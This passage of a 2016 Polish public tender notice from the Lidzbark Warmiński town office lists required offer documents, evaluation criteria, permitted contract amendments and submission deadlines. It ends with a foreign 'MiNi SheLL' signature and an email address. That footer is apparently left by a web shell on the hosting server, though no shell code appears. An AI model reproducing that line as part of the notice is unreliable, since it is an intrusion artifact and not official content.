2.Wypełniony i podpisany formularz: Opis urządzeń i produktów, sporządzony 
              zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ. 3. Kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej.
4. Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty   
    nie wynika bezpośrednio z dokumentów załączonych do oferty. 
    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - 
    dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu 
    o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia 
 umowy w sprawie niniejszego zamówienia publicznego,
 5. Kopię dowodu wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Okres gwarancji jakości - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której 
    dokonano wyboru Wykonawcy, mogą być dokonane w następującym zakresie:
1) Zaistnienie okoliczności uniemożliwiających realizację przedmiotu umowy w terminie 
    przewidzianym na zakończenie robót, a w szczególności:
    a) wystąpienie warunków atmosferycznych odbiegających od typowych, 
       uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, 
       dokonywanie odbiorów, 
    b) wystąpienie klęski żywiołowej, 
    c) wystąpienie nieprzewidzianych w SIWZ warunków geologicznych, archeologicznych lub 
        terenowych, w szczególności: niewypały, niewybuchy, wykopaliska archeologiczne,
    d) zmiana zakresu robót budowlanych, wystąpienie robót zamiennych lub dodatkowych 
        od wykonania których uzależnione jest wykonanie zamówienia podstawowego,
    e) wystąpienie przestojów robót budowlanych spowodowanych wstrzymaniem wykonania 
        robót budowlanych przez uprawnione organy, z przyczyn nie wynikających z winy 
        stron umowy,
2) Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych 
   spowodowanych, w szczególności następującymi okolicznościami:
   a) niedostępność na rynku materiałów lub urządzeń lub produktów wskazanych                                
       w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót 
       budowlanych spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych 
       materiałów lub urządzeń lub produktów,
   b) pojawienie się na rynku materiałów lub urządzeń lub produktów nowszej generacji 
       pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów 
       eksploatacji wykonanego przedmiotu umowy,
   c) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań 
      technicznych/technologicznych niż wskazane w opisie technicznym lub 
      w specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji gdyby 
      zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym 
      wykonaniem przedmiotu umowy.
2. W przypadku zaistnienia okoliczności, o których mowa w ust. 1 pkt 1 termin realizacji 
przedmiotu umowy może ulec wydłużeniu o okres trwania tych okoliczności lub o czas  
niezbędny do należytego wykonania przedmiotu umowy.
3. Zmiana umowy może również nastąpić w przypadku:
	1)	zmiany przepisów prawa mających wpływ na treść umowy,
	2)	zaistnienia konieczności wykonania robót zamiennych potwierdzonych przez osoby  
  	      uprawnione, cena ryczałtowa może ulec zmianie o różnicę wartości robót 
          (materiałów) zamiennych ustalonych kosztorysem powykonawczym zatwierdzonym 
          przez Zamawiającego,  a wartością ryczałtową tego zakresu robót, zamiast którego 
          będą wykonywane  roboty (stosowane materiały) zamienne, 
	3)   ograniczenia zakresu robót lub wprowadzenia robót zamiennych o niższej wartości    
	      niż przewidywana w SIWZ i w ofercie, wysokość wynagrodzenia Wykonawcy 
           zostanie zmniejszona, 
	4)	niewykonania części lub całości zamówienia z powodu tego, że wykonanie 
           zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć                     
           w chwili zawarcia umowy, tym przypadku, wysokość wynagrodzenia Wykonawcy 
           zostanie zmniejszona o wartość robót niewykonanych,
    5)    zmiany kierownika budowy lub  kierowników robót lub inspektorów nadzoru 
           inwestorskiego, 
    6)	zmiany osób reprezentujących strony,
    7)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie                         
           z  SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com